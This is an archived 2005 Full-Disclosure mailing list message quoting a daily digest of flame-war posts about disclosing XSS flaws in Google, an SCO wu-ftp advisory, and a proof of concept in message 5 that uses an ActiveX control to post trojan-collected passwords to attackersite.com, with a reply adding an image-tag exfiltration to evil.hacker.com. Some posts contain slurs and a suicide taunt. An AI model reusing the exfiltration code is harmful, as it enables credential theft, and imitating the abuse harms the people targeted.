| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <BAY22-F146FEF776BF79AB2FC4DD8EF310@phx.gbl>
Date: Wed Dec 21 18:31:04 2005
From: jmcboy981 at hotmail.com (Ahmed Aydogan)
Subject: RE:DON'T SEND ME AGAIN PLS
DON'T SEND ME AGAIN PLS
>From: full-disclosure-request@...ts.grok.org.uk
>Reply-To: full-disclosure@...ts.grok.org.uk
>To: full-disclosure@...ts.grok.org.uk
>Subject: Full-Disclosure Digest, Vol 10, Issue 70
>Date: Wed, 21 Dec 2005 18:25:14 +0000 (GMT)
>
>Send Full-Disclosure mailing list submissions to
> full-disclosure@...ts.grok.org.uk
>
>To subscribe or unsubscribe via the World Wide Web, visit
> https://lists.grok.org.uk/mailman/listinfo/full-disclosure
>or, via email, send a message with subject or body 'help' to
> full-disclosure-request@...ts.grok.org.uk
>
>You can reach the person managing the list at
> full-disclosure-owner@...ts.grok.org.uk
>
>When replying, please edit your Subject line so it is more specific
>than "Re: Contents of Full-Disclosure digest..."
>
>
>Note to digest recipients - when replying to digest posts, please trim your
>post appropriately. Thank you.
>
>
>Today's Topics:
>
> 1. Re: XSS vulnerabilities in Google.com (Mohit Muthanna)
> 2. Alternate take on list trolls (womber)
> 3. Re: XSS vulnerabilities in Google.com (fok yo)
> 4. Re: XSS vulnerabilities in Google.com (n3td3v)
> 5. Re: new attack technique? using JavaScript+XML+OWS Post Data
> (Joachim Schipper)
> 6. SCOSA-2005.63 OpenServer 5.0.6 OpenServer 5.0.7 OpenServer
> 6.0.0 : wu-ftp Denial of Service Vulnerability (security@....com)
> 7. Re: XSS vulnerabilities in Google.com (GroundZero Security)
> 8. Re: XSS vulnerabilities in Google.com (n3td3v)
> 9. RE: XSS vulnerabilities in Google.com (Edward Pearson)
> 10. Re: XSS vulnerabilities in Google.com (GroundZero Security)
> 11. Character vulnerabilities (Peer Janssen)
> 12. Re: XSS vulnerabilities in Google.com (fok yo)
> 13. [EMED-L] Patriot Act and HIPPA (fwd) (J.A. Terranson)
> 14. Re: Firewall (The Movie) -
> http://firewallmovie.warnerbros.com/cmp/trailer.html?id=trailer
> (Slythers Bro)
> 15. Re: XSS vulnerabilities in Google.com (n3td3v)
> 16. Re: SCOSA-2005.63 OpenServer 5.0.6 OpenServer 5.0.7
> OpenServer 6.0.0 : wu-ftp Denial of Service Vulnerability (KF
>(lists))
> 17. RE: Character vulnerabilities (wilder_jeff Wilder)
> 18. Re: XSS vulnerabilities in Google.com (GroundZero Security)
> 19. Re: XSS vulnerabilities in Google.com (n3td3v)
>
>
>----------------------------------------------------------------------
>
>Message: 1
>Date: Wed, 21 Dec 2005 11:00:11 -0500
>From: Mohit Muthanna <mohit.muthanna@...il.com>
>Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
>To: GroundZero Security <fd@....org>
>Cc: full-disclosure@...ts.grok.org.uk
>Message-ID:
> <fdb3980a0512210800h13a10f20h83cab9d43942a59c@...l.gmail.com>
>Content-Type: text/plain; charset=ISO-8859-1
>
>I thought I qualified my response well enough to prevent any
>ambiguities, but I guess I have to try again.
>
> > > Sure, but "google != howardsblog.com". A large part of the population
> > > (including myself) relies on Google's various services for day-to-day
> > > use. I sure as hell would not feel comfortable knowing that I'm using
> > > a service that can potentially leak my information.
> >
> > i'm not talking about some shitty site that noone knows, but a lof of
>big websites have
> > such vulnerabilities.
>
>And they should be disclosed. Plain and simple.
>
> > > That's quite a blanket statement to make. I'm sure a few people in the
> > > "security community" would like to know that there exists a
> > > vulnerability in a Google service.
> >
> > yeah maybe but if we end up posting about every site that offers
>services to users
> > and has xss issues then this list would be reciving a flood of mails :P
>
>That's called full-disclosure. It's the point of this list. It keeps
>(or attempts to keep) service providers, software companies, and the
>"security community" on their toes.
>
> > its not hard to test for xss, so if you are really so afraid of it go
>test it yourself and
> > notify the website owner.
>
>I don't have the time for it, nor do I care for it. I rely on this and
>other lists to keep me informed.
>
> > > No. But a site need not be audited to discover a bug.
> >
> > ah ok so you think illegal activity is the way to go ?
>
>Where did you get that impression? Let me rephrase for clarity:
>
>No it is not legal. But a bug can be discovered by other means than
>auditing. Like say, by simply using the service.
>
> > > XSS can do a lot of harm. A compromised administrator account is
> > > generally a compromised server. There are some good XSS resources on
> > > the web you can read up on.
> >
> > no as they dont rely on /etc/passwd users but have their own database
>usually
> > via mysql or so and a compromised admin user on some webinterface isnt
>always
> > going to end up in compromise of the whole server unless the admin is
>stupid
> > enough to use the same passwords for root and the webbased software.
>
>That isn't outside the realm of possibility.
>
>Again, you missed my qualifier: "generally".
>
>It is quite likely that once a determined hacker has admin priviliges
>on "some webinterface", he will eventually find a way to own the box.
>Not "always" but "quite likely".
>
>FYI, /etc/passwd is not the only way one can gain root. Larger
>services don't even use /etc/passwd.
>
>There's more than one way to skin a cat.
>
> > in most cases this will only end up in control of the web parts i.e.
>some forum.
> > i agree that this is a problem, but its still not resulting in root
>access on the shell.
>
>How do you know? Have you worked with every single web application
>that exists in the universe?
>
>In any case, even if it doesn't result in gaining root, don't you
>think that it is serious? If an XSS vulnerability was found in Flikr,
>or del.icio.us, or basecamp, or any other online service, and it lead
>to "control of the web parts", would you be comfortable using their
>services?
>
>What if they were paid services? Then does is qualify for full-disclosure?
>
> > oh and i dont have to read about it so keep your sarcasm to yourself.
>
>So then you agree that a XSS vulnerability is serious, and should be
>disclosed.
>
> > > Then, my friend, you have discovered a bug.
> >
> > mhm sure, imagine you find a DoS in your precious google, then you would
>take them
> > down and you really belive they would thank you for that ?
> > you would be raided in no time.
> > you think they would belive you that you did it only for a good cause ?
>yeah right...
>
>If I found it during the course of my using the service, sure. Why not?
>
>I've developed online services before, and I've had bugs reported.
>Contrary to what you may think, instead of "calling the feds", I try
>to fix the problem as soon as I can. I'm also glad it was reported by
>a user, as opposed to being exploited by a hacker.
>
> > > "There are 10 types of people. Those who understand binary, and those
> > > who don't."
> >
> > you dont...
>
>Very classy.
>
>--
>Mohit Muthanna [mohit (at) muthanna (uhuh) com]
>"There are 10 types of people. Those who understand binary, and those
>who don't."
>
>
>------------------------------
>
>Message: 2
>Date: Wed, 21 Dec 2005 10:13:54 -0600
>From: womber <womber@...il.com>
>Subject: [Full-disclosure] Alternate take on list trolls
>To: full-disclosure@...ts.grok.org.uk
>Message-ID:
> <5aad114b0512210813q44a28d0m236471a6251b0652@...l.gmail.com>
>Content-Type: text/plain; charset=ISO-8859-1
>
>I know some people have stated they thought a certain list member (to
>remain nameless) is really someone doing social engineering.
>Given the type of replies recently it is starting to look to me as
>this could be possible.
>The statement "where are your yahoo or google exploits?" which keeps
>coming up makes me feel like yahoo is too cheep to check their code
>themselves or pay a firm to check, that they try to stir up security
>people to check it thoroughly because they can shove it back in a
>certain members face.
>It could also be a severe lack of social skills on that persons part.
>Just thought I would throw that out there, because it would not be
>unlike a company to avoid paying money if they do not have to.
>
>
>------------------------------
>
>Message: 3
>Date: Wed, 21 Dec 2005 17:15:10 +0100
>From: fok yo <yoo.fok@...il.com>
>Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
>To: GroundZero Security <fd@....org>
>Cc: full-disclosure@...ts.grok.org.uk
>Message-ID: <cd8f1f1e0512210815h145c0796v@...l.gmail.com>
>Content-Type: text/plain; charset="iso-8859-1"
>
>exactly.
>n3td3v's nothing but a pose, she's trying to be a respected security
>researcher, but she hides behind an anonymous nick. What groundbreaking
>research did n3tf4rt conduct? Nothing, still google has 68K+ hits for
>n3td3v, waste of bandwidth, storage, time.
>This is an ongoing pollution which should come to an end. Please nd, KILL
>yourself, don't even post your suicide note to fd (although that would be
>the post of the year).
>I hope google or yahoo sue n3td0rk for reverse engineering their web apps.
>Jealousy is something for 14yo girls, bitch.
>
>2005/12/21, GroundZero Security <fd@....org>:
> >
> > google or yahoo, google or yahoo ..blah go find some real bugs noone is
> > jealous of you, we just think
> > its redicilous how you try to show off with your non existing skills and
> > reputation. you are the greatest lamer
> > i'v seen on this list sofar. so instead of braging about how great you
> > are, you should actually try and learn about
> > security then soon you will realize that your xss shit is just pathetic
> > and nothing to be proud of.
> > you think finding some simple xss in a website such as yahoo or google
> > makes you superior to everyone else here ?
> > 99% of the people on this list are more skilled than you, thats fact! so
> > stop trying to show off it wont work.
> > code a double free() remote exploit, then i would agree that you have
> > skill. until you do that shut the fuck up kiddie.
> > when i started over 11 years ago, you couldnt even spell the word
> > computer. so please you should finally realize
> > that you are at the wrong place. i mean look around how many people
> > complain about you beeing annoying.
> > oh and if you couldnt figure it out by now, groundzero is my company you
> > little moron.
> > -sk
> > ----- Original Message -----
> > From: "n3td3v" <xploitable@...il.com>
> > To: "GroundZero Security" <fd@....org>;
><full-disclosure@...ts.grok.org.uk
> > >
> > Sent: Wednesday, December 21, 2005 4:26 PM
> > Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
> >
> >
> > > Your argument for having Google and Yahoo vulnerabilities (especially
> > > XSS) banned from FD is very poor. GroundZero or whoever you may be.
> > > Please get off the list and stop disrespecting others who do disclose
> > > vulnerabilities in Google And Yahoo
> > >
> > > On 12/21/05, GroundZero Security <fd@....org> wrote:
> > > >
> > > > > Sure, but "google != howardsblog.com". A large part of the
> > population
> > > > > (including myself) relies on Google's various services for
> > day-to-day
> > > > > use. I sure as hell would not feel comfortable knowing that I'm
> > using
> > > > > a service that can potentially leak my information.
> > > >
> > > > i'm not talking about some shitty site that noone knows, but a lof
>of
> > big websites have
> > > > such vulnerabilities.
> > > >
> > > > > That's quite a blanket statement to make. I'm sure a few people in
> > the
> > > > > "security community" would like to know that there exists a
> > > > > vulnerability in a Google service.
> > > >
> > > > yeah maybe but if we end up posting about every site that offers
> > services to users
> > > > and has xss issues then this list would be reciving a flood of mails
> > :P
> > > > its not hard to test for xss, so if you are really so afraid of it
>go
> > test it yourself and
> > > > notify the website owner.
> > > >
> > > > > No. But a site need not be audited to discover a bug.
> > > >
> > > > ah ok so you think illegal activity is the way to go ?
> > > > you cant just audit any site you want you know, but hey
> > > > if you want to get a visit from the feds why dont you audit some
> > gov/mil i'm sure
> > > > there are lots of xss to discover :P
> > > >
> > > > > XSS can do a lot of harm. A compromised administrator account is
> > > > > generally a compromised server. There are some good XSS resources
>on
> > > > > the web you can read up on.
> > > >
> > > > no as they dont rely on /etc/passwd users but have their own
>database
> > usually
> > > > via mysql or so and a compromised admin user on some webinterface
>isnt
> > always
> > > > going to end up in compromise of the whole server unless the admin
>is
> > stupid
> > > > enough to use the same passwords for root and the webbased software.
> > > > in most cases this will only end up in control of the web parts i.e.
> > some forum.
> > > > i agree that this is a problem, but its still not resulting in root
> > access on the shell.
> > > > oh and i dont have to read about it so keep your sarcasm to
>yourself.
> > > >
> > > > > Then, my friend, you have discovered a bug.
> > > >
> > > > mhm sure, imagine you find a DoS in your precious google, then you
> > would take them
> > > > down and you really belive they would thank you for that ? you would
> > be raided in no time.
> > > > you think they would belive you that you did it only for a good
>cause
> > ? yeah right...
> > > >
> > > >
> > > > > "There are 10 types of people. Those who understand binary, and
> > those
> > > > > who don't."
> > > >
> > > > you dont...
> > > >
> > > >
> > > > _______________________________________________
> > > > Full-Disclosure - We believe in it.
> > > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > > > Hosted and sponsored by Secunia - http://secunia.com/
> > > >
> > >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>-------------- next part --------------
>An HTML attachment was scrubbed...
>URL:
>http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051221/93347fab/attachment-0001.html
>
>------------------------------
>
>Message: 4
>Date: Wed, 21 Dec 2005 16:21:01 +0000
>From: n3td3v <xploitable@...il.com>
>Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
>To: GroundZero Security <fd@....org>,
> full-disclosure@...ts.grok.org.uk
>Message-ID:
> <4b6ee9310512210821j7a5e8484l7253cf5de1a159fe@...l.gmail.com>
>Content-Type: text/plain; charset=ISO-8859-1
>
>On 12/21/05, GroundZero Security <fd@....org> wrote:
> > google or yahoo, google or yahoo
>
>Google and Yahoo is my specialized subject as is corporate security as
>a whole, don't be suprised if Google and Yahoo come up, they're the
>biggest of the biggest out there on the landscape.
>
> > its redicilous how you try to show off with your non existing skills and
>reputation. you are the greatest lamer
>
>You're very sure I don't have any skills?
>
> > you think finding some simple xss in a website such as yahoo or google
>makes you superior to everyone else here ?
>
>You must be thinking thats all I find ;-)
>
> > 99% of the people on this list are more skilled than you, thats fact! so
>stop trying to show off it wont work.
>
>You're not one of them, be off with you
>
> > code a double free() remote exploit, then i would agree that you have
>skill. until you do that shut the fuck up kiddie.
>
>Using profanity against those with more Google and Yahoo
>vulnerabilities than you won't help you become better
>
> > when i started over 11 years ago, you couldnt even spell the word
>computer. so please you should finally realize
> > that you are at the wrong place. i mean look around how many people
>complain about you beeing annoying.
> > oh and if you couldnt figure it out by now, groundzero is my company you
>little moron.
>
>11 years, and hi-jacking legitmate dislclosures like this one? You've
>learned alot. God forbid you, if you really do own a security company.
>
>
>------------------------------
>
>Message: 5
>Date: Wed, 21 Dec 2005 17:36:04 +0100
>From: Joachim Schipper <j.schipper@...h.uu.nl>
>Subject: Re: [Full-disclosure] new attack technique? using
> JavaScript+XML+OWS Post Data
>To: full-disclosure@...ts.grok.org.uk
>Message-ID: <20051221163604.GC23202@...pomene.jschipper.dynalias.net>
>Content-Type: text/plain; charset=us-ascii
>
>On Wed, Dec 21, 2005 at 08:58:30PM +0530, Gaurav Kumar wrote:
> > While researching COM related security vulnerabilities I thought of
> > this possible attack technique, not sure if it has been discussed
> > before.
> >
> >
> > Problem/challenge statement:
> >
> > A Trojan has been to be placed in a system running an application
> > firewall like Zone Alarm Pro etc. The Trojan is not allowed to make
> > any outbound connections. The challenge is to send data (key logged
> > passwords etc) back to the attacker.
>
> > Solution
> >
> > The Trojan can be designed to generate an xml file which will contain
> > the data to be sent out. The attacker will lure the user to visit a
> > website hosted by him. The site can have following HTML code-
> >
> > <html>
> > <body>
> > The author is not responsible for any misuse, this PoC is for
> > educational purpose only.
> > <object classid="clsid:{BDEADE98-C265-11D0-BCED-00A0C90AB50F}"
> > id="exp">
> > </object>
> > <script LANGUAGE=javascript>
> > var xmlDoc
> > xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
> > xmlDoc.async=false;
> > xmlDoc.load("c:\\note.xml");
> > xmlObj=xmlDoc.documentElement;
> > var a= xmlObj.firstChild.text;
> > exp.Post(0,"http://www.attackersite.com/input.asp",a);
> > </script>
> > </body>
> > </html>
> >
> > Content of note.xml could be ?
> >
> > <password>secret</password>
> >
> >
> > The above code (works well on windows XP SP2) essentials calls "OWS
> > Post Data" COM control to post the contents of note.xml (generated by
> > trojan) to attackersite.com
> >
> > Essentially, the technique is breaking the basic functionality of
> > application firewalls by using OWS Post Data as bridge for sending out
> > the data using Javascript and XML.
>
> > flames/spam/abuse etc can be sent to spam@...urebox.org
> > comments can be sent to gaurav@...urebox.org
>
>I'll just assume you read the list.
>
>I'm not an expert, but I don't recall ever seeing this particular
>implementation. Then again, there are easier ways to go about this - for
>instance, how about embedding a <img
>src="http://evil.hacker.com/callback/ThisIsMyVerySecretPassWord" width=1
>height=1> tag into an arbitrary HTML file? It works on any graphical
>browser without special protection.
>
>Search the archives for some more neat tricks - calling the proper APIs,
>IE can be used to send out pretty much arbitrary data. [1]
>
>If you're willing to attack ZA specifically (instead of a generic
>application/-based firewall, of which there are many) just use the
>Windows API to generate the proper mouse clicks/keypresses.
>
> Joachim
>
>[1] Some would say that, calling the 'proper' APIs, IE can be used to
>send *in* pretty much arbitrary data too. I'd be inclined to agree.
>
>
>------------------------------
>
>Message: 6
>Date: Wed, 21 Dec 2005 11:34:42 -0500 (EST)
>From: security@....com
>Subject: [Full-disclosure] SCOSA-2005.63 OpenServer 5.0.6 OpenServer
> 5.0.7 OpenServer 6.0.0 : wu-ftp Denial of Service Vulnerability
>To: security-announce@...t.sco.com
>Message-ID: <Pine.UW2.4.63.0512211134040.11687@...d.nj.sco.com>
>Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed
>
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>______________________________________________________________________________
>
> SCO Security Advisory
>
>Subject: OpenServer 5.0.6 OpenServer 5.0.7 OpenServer 6.0.0 : wu-ftp
>Denial of Service Vulnerability
>Advisory number: SCOSA-2005.63
>Issue date: 2005 December 21
>Cross reference: sr893936 fz532335 erg712856
> sr895049 fz533027 erg712952
> CVE-2005-0256
>______________________________________________________________________________
>
>
>1. Problem Description
>
> The wu_fnmatch function in wu_fnmatch.c allows remote attackers
> to cause a denial of service (CPU exhaustion by recursion) via a
> glob pattern with a large number of * (wildcard) characters, as
> demonstrated using the dir command.
>
> The Common Vulnerabilities and Exposures project (cve.mitre.org)
> has assigned the following name CVE-2005-0256 to this issue.
>
>
>2. Vulnerable Supported Versions
>
> System Binaries
> ----------------------------------------------------------------------
> OpenServer 5.0.6 /etc/ftpd
> OpenServer 5.0.7 /etc/ftpd
> OpenServer 6.0.0 /etc/ftpd
>
>
>3. Solution
>
> The proper solution is to install the latest packages.
>
>
>4. OpenServer 5.0.6
>
> 4.1 Location of Fixed Binaries
>
> ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.63
>
>
> 4.2 Verification
>
> MD5 (p532335.506_vol.tar) = 89ea2ed1f88da6721bd73c3889f9ac0c
>
> md5 is available for download from
> ftp://ftp.sco.com/pub/security/tools
>
>
> 4.3 Installing Fixed Binaries
>
> The following package should be installed on your system before you
> install this fix:
>
> OSS646C
>
> Upgrade the affected binaries with the following sequence:
>
> 1) Download p532335.506_vol.tar to a directory.
>
> 2) Extract VOL* files.
>
> # tar xvf p532335.506_vol.tar
>
> 3) Run the custom command, specify an install
> from media images, and specify the directory as
> the location of the images.
>
>
>5. OpenServer 5.0.7
>
> 5.1 Location of Fixed Binaries
>
> The fixes are only available in SCO OpenServer Release 5.0.7
> Maintenance Pack 4 or later.
>
> ftp://ftp.sco.com/pub/openserver5/507/mp/osr507mp4/osr507mp4_vol.tar
>
>
> 5.2 Verification
>
> MD5 (osr507mp4_vol.tar) = 4c87d840ff5b43221258547d19030228
>
> md5 is available for download from
> ftp://ftp.sco.com/pub/security/tools
>
>
> 5.3 Installing Fixed Binaries
>
> See the SCO OpenServer Release 5.0.7 Maintenance Pack 4 Release
> and Installation Notes:
>
> ftp://ftp.sco.com/pub/openserver5/507/mp/osr507mp4/osr507mp4.htm
>
>
>6. OpenServer 6.0.0
>
> 6.1 Location of Fixed Binaries
>
> ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.63
>
>
> 6.2 Verification
>
> MD5 (p533027.600_vol.tar) = d939cb729d115c9bef2d2032903f2125
>
> md5 is available for download from
> ftp://ftp.sco.com/pub/security/tools
>
>
> 6.3 Installing Fixed Binaries
>
> Upgrade the affected binaries with the following sequence:
>
> 1) Download p533027.600_vol.tar to a directory.
>
> 2) Extract VOL* files.
>
> # tar xvf p533027.600_vol.tar
>
> 3) Run the custom command, specify an install
> from media images, and specify the directory as
> the location of the images.
>
>
>7. References
>
> Specific references for this advisory:
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0256
>
> http://www.idefense.com/application/poi/display?id=207&type=vulnerabilities
>
> SCO security resources:
> http://www.sco.com/support/security/index.html
>
> SCO security advisories via email
> http://www.sco.com/support/forums/security.html
>
> This security fix closes SCO incidents sr893936 fz532335
> erg712856 sr895049 fz533027 erg712952.
>
>
>8. Disclaimer
>
> SCO is not responsible for the misuse of any of the information
> we provide on this website and/or through our security
> advisories. Our advisories are a service to our customers
> intended to promote secure installation and use of SCO
> products.
>
>
>9. Acknowledgments
>
> SCO would like to thank Adam Zabrocki.
>
>______________________________________________________________________________
>-----BEGIN PGP SIGNATURE-----
>Version: GnuPG v1.4.2 (UnixWare)
>
>iD8DBQFDqYDTaqoBO7ipriERAtzOAJ0ctD8xRYQrLkkgyHsMqCvfQdPBFQCeIgx7
>xqqmzQCNiw6t+WtSL5rqo4E=
>=ha4X
>-----END PGP SIGNATURE-----
>
>
>------------------------------
>
>Message: 7
>Date: Wed, 21 Dec 2005 17:57:31 +0100
>From: "GroundZero Security" <fd@....org>
>Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
>To: "php0t" <php0t@...ro.hu>
>Cc: full-disclosure@...ts.grok.org.uk
>Message-ID: <017001c6064f$a4617030$0100a8c0@...learwinter>
>Content-Type: text/plain; charset="iso-8859-1"
>
>yes you are right, but its like if noone tells him what a stupid fag he is,
>he will keep posting and posting his irrelevant crap and just ignore the
>tons of private
>mail he receives. i'm sorry for adding to the noise, but its just too
>tempting.
>i try to ignore it. but i cant promise i will, the last mail he sent just
>asks for a reply :P
>but ok...must...resist.....
>btw my name is not groundzero, thats my company :)
>
>greetz
>-sk
>Http://www.groundzero-security.com
>
>----- Original Message -----
>From: "php0t" <php0t@...ro.hu>
>To: "'GroundZero Security'" <fd@....org>
>Sent: Wednesday, December 21, 2005 5:06 PM
>Subject: RE: [Full-disclosure] XSS vulnerabilities in Google.com
>
>
> >
> > hi, groundzero.
> >
> > I agree whole heartedly and the dood pisses me off too, just like
> > everybody else.
> >
> > On the other hand, seeing him repeat google/yahoo again and again all
> > the time and seeing the obvious-to-come replies makes my email alert
> > fuck the mp3's up I'm listening to too often.
> >
> > My idea is this: how'bout each time the guy posts something
> > ridiculous, all of us who are grasping our heads tearing our last pieces
> > of hair out thniking to ourselves 'omfgwtfd00d' just write him a private
> > email containing talk-to-the-hand or something? This would achieve two
> > things: 1) less noise on the list 2) instead of being able to reply
> > endlessly with bullcrap to the thread, he would just have to deal with
> > nobody giving a fuck about him in public, still 10 emails saying 'I
> > don't care' whenever he makes a post.
> >
> > Tell me if you think this sucks, it's just an idea.
> >
> > Php0t
> >
> >
> >
> >
> > -----Original Message-----
> > From: full-disclosure-bounces@...ts.grok.org.uk
> > [mailto:full-disclosure-bounces@...ts.grok.org.uk] On Behalf Of
> > GroundZero Security
> > Sent: Wednesday, December 21, 2005 4:54 PM
> > To: n3td3v
> > Cc: full-disclosure@...ts.grok.org.uk
> > Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
> >
> >
> > google or yahoo, google or yahoo ..blah go find some real bugs noone is
> > jealous of you, we just think
> > its redicilous how you try to show off with your non existing skills and
> > reputation. you are the greatest lamer i'v seen on this list sofar. so
> > instead of braging about how great you are, you should actually try and
> > learn about security then soon you will realize that your xss shit is
> > just pathetic and nothing to be proud of. you think finding some simple
> > xss in a website such as yahoo or google makes you superior to everyone
> > else here ? 99% of the people on this list are more skilled than you,
> > thats fact! so stop trying to show off it wont work. code a double
> > free() remote exploit, then i would agree that you have skill. until you
> > do that shut the fuck up kiddie. when i started over 11 years ago, you
> > couldnt even spell the word computer. so please you should finally
> > realize that you are at the wrong place. i mean look around how many
> > people complain about you beeing annoying. oh and if you couldnt figure
> > it out by now, groundzero is my company you little moron. -sk
> > ----- Original Message -----
> > From: "n3td3v" <xploitable@...il.com>
> > To: "GroundZero Security" <fd@....org>;
> > <full-disclosure@...ts.grok.org.uk>
> > Sent: Wednesday, December 21, 2005 4:26 PM
> > Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
> >
> >
> > > Your argument for having Google and Yahoo vulnerabilities (especially
> > > XSS) banned from FD is very poor. GroundZero or whoever you may be.
> > > Please get off the list and stop disrespecting others who do disclose
> > > vulnerabilities in Google And Yahoo
> > >
> > > On 12/21/05, GroundZero Security <fd@....org> wrote:
> > > >
> > > > > Sure, but "google != howardsblog.com". A large part of the
> > > > > population (including myself) relies on Google's various services
> > > > > for day-to-day use. I sure as hell would not feel comfortable
> > > > > knowing that I'm using a service that can potentially leak my
> > > > > information.
> > > >
> > > > i'm not talking about some shitty site that noone knows, but a lof
> > > > of big websites have such vulnerabilities.
> > > >
> > > > > That's quite a blanket statement to make. I'm sure a few people in
> >
> > > > > the "security community" would like to know that there exists a
> > > > > vulnerability in a Google service.
> > > >
> > > > yeah maybe but if we end up posting about every site that offers
> > > > services to users and has xss issues then this list would be
> > > > reciving a flood of mails :P its not hard to test for xss, so if you
> >
> > > > are really so afraid of it go test it yourself and notify the
> > > > website owner.
> > > >
> > > > > No. But a site need not be audited to discover a bug.
> > > >
> > > > ah ok so you think illegal activity is the way to go ?
> > > > you cant just audit any site you want you know, but hey
> > > > if you want to get a visit from the feds why dont you audit some
> > > > gov/mil i'm sure there are lots of xss to discover :P
> > > >
> > > > > XSS can do a lot of harm. A compromised administrator account is
> > > > > generally a compromised server. There are some good XSS resources
> > > > > on the web you can read up on.
> > > >
> > > > no as they dont rely on /etc/passwd users but have their own
> > > > database usually via mysql or so and a compromised admin user on
> > > > some webinterface isnt always going to end up in compromise of the
> > > > whole server unless the admin is stupid enough to use the same
> > > > passwords for root and the webbased software. in most cases this
> > > > will only end up in control of the web parts i.e. some forum. i
> > > > agree that this is a problem, but its still not resulting in root
> > > > access on the shell. oh and i dont have to read about it so keep
> > > > your sarcasm to yourself.
> > > >
> > > > > Then, my friend, you have discovered a bug.
> > > >
> > > > mhm sure, imagine you find a DoS in your precious google, then you
> > > > would take them down and you really belive they would thank you for
> > > > that ? you would be raided in no time. you think they would belive
> > > > you that you did it only for a good cause ? yeah right...
> > > >
> > > >
> > > > > "There are 10 types of people. Those who understand binary, and
> > > > > those who don't."
> > > >
> > > > you dont...
> > > >
> > > >
> > > > _______________________________________________
> > > > Full-Disclosure - We believe in it.
> > > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > > > Hosted and sponsored by Secunia - http://secunia.com/
> > > >
> > >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>
>------------------------------
>
>Message: 8
>Date: Wed, 21 Dec 2005 17:16:54 +0000
>From: n3td3v <xploitable@...il.com>
>Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
>To: GroundZero Security <fd@....org>,
> full-disclosure@...ts.grok.org.uk
>Message-ID:
> <4b6ee9310512210916h66104d21n484173a514c0d57e@...l.gmail.com>
>Content-Type: text/plain; charset=ISO-8859-1
>
>You trolled this thread by saying Watchfire should stop disclosing
>vulnerabilities for Yahoo and Google. You get the response you
>deserved to get. Now you're running off the thread now with your tail
>between your legs, because everyone has told you that Google and Yahoo
>vulnerabilities (especially XSS) will never be banned from FD.
>
>
>On 12/21/05, GroundZero Security <fd@....org> wrote:
> > yes you are right, but its like if noone tells him what a stupid fag he
>is,
> > he will keep posting and posting his irrelevant crap and just ignore the
>tons of private
> > mail he receives. i'm sorry for adding to the noise, but its just too
>tempting.
> > i try to ignore it. but i cant promise i will, the last mail he sent
>just asks for a reply :P
> > but ok...must...resist.....
> > btw my name is not groundzero, thats my company :)
> >
> > greetz
> > -sk
>
>
>------------------------------
>
>Message: 9
>Date: Wed, 21 Dec 2005 17:41:14 -0000
>From: "Edward Pearson" <Ed@...tymail.co.uk>
>Subject: RE: [Full-disclosure] XSS vulnerabilities in Google.com
>To: <full-disclosure@...ts.grok.org.uk>
>Message-ID:
> <4DB4124FD67F9745B9E09DADDC297467724292@...tydc.unity1.local>
>Content-Type: text/plain; charset="us-ascii"
>
>Why has this become a trolling?
>"if noone tell him what a stupid fag he is"
>Are we back at fucking middle school? Have we decended to the level of
>10 year olds??
>
>Ground Zero, I've seen your company website(s) and your products. All I
>say is I think you have several very good resons to pay FUCKING close
>attention to what is said on this list. Work it out.
>
>The only people who seem hell bent on ruining this list for everyone
>are:
>InfoSecBOFH
>n3td3v
>Ground Zero Security
>
>None of these people have anything to bring to the table.
>Lets see at least one real vuln report/exploit from one of you, and then
>the other two have to concentrate on growing up enough to not troll it
>or make stupid pre-school comments.
>
>Come on guys!!! I'm beginning to thing that actually you're not bigger
>than this...
>
>Ultimatly, if you've got problems with each other, do it on MSN, AIM,
>IRC, USENET whatever, just not my inbox.
>
>Have a fucking excellent day.
>
>- Ed (BTW, Ground Zero's has my alais since 1995, now I see that this
>chump is going round putting a black mark by it)
>
>-----Original Message-----e
>From: full-disclosure-bounces@...ts.grok.org.uk
>[mailto:full-disclosure-bounces@...ts.grok.org.uk] On Behalf Of n3td3v
>Sent: 21 December 2005 17:17
>To: GroundZero Security; full-disclosure@...ts.grok.org.uk
>Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
>
>You trolled this thread by saying Watchfire should stop disclosing
>vulnerabilities for Yahoo and Google. You get the response you deserved
>to get. Now you're running off the thread now with your tail between
>your legs, because everyone has told you that Google and Yahoo
>vulnerabilities (especially XSS) will never be banned from FD.
>
>
>On 12/21/05, GroundZero Security <fd@....org> wrote:
> > yes you are right, but its like if noone tells him what a stupid fag
> > he is, he will keep posting and posting his irrelevant crap and just
> > ignore the tons of private mail he receives. i'm sorry for adding to
>the noise, but its just too tempting.
> > i try to ignore it. but i cant promise i will, the last mail he sent
> > just asks for a reply :P but ok...must...resist.....
> > btw my name is not groundzero, thats my company :)
> >
> > greetz
> > -sk
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
>
>------------------------------
>
>Message: 10
>Date: Wed, 21 Dec 2005 18:39:31 +0100
>From: "GroundZero Security" <fd@....org>
